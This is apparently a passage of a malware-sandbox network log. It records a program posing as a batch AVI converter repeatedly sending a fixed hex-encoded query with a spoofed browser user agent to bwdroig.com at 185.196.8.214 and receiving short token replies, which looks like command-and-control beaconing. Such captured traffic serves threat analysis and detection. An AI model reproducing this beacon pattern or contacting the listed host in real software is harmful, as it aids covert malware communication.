                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:16.623903990 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:16.890240908 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:16.998512030 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:17.260364056 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.549718185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:17.381763935 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:18.082767963 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.549719185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:18.215065002 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:18.905867100 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.549720185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:19.036345959 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:19.748555899 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:19.858717918 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:20.096484900 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.549721185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:20.226300955 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:20.935949087 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:21.045954943 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:21.296415091 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.549722185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:21.430515051 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:22.197506905 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.549723185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:22.316538095 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:22.998537064 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:23.109916925 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:23.356381893 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:23.469322920 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:23.709589958 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.549724185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:23.859535933 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:24.545241117 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:24.655040979 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:24.913373947 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.549725185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:25.038696051 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:25.760459900 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:25.875525951 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:26.218106985 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:26.328850031 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:26.568453074 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.549726185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:26.698498011 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:27.422672987 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:27.533900023 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:27.778727055 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:27.889357090 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:28.137547016 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:28.250528097 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:28.493657112 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.549727185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:28.615607023 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:29.319762945 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.549728185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:29.441644907 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:30.164091110 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.549729185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:30.287338972 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:31.117788076 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.549730185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:31.240688086 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:31.960966110 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.549731185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:32.082981110 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:33.084676027 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.549732185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:33.207740068 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:33.902400017 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
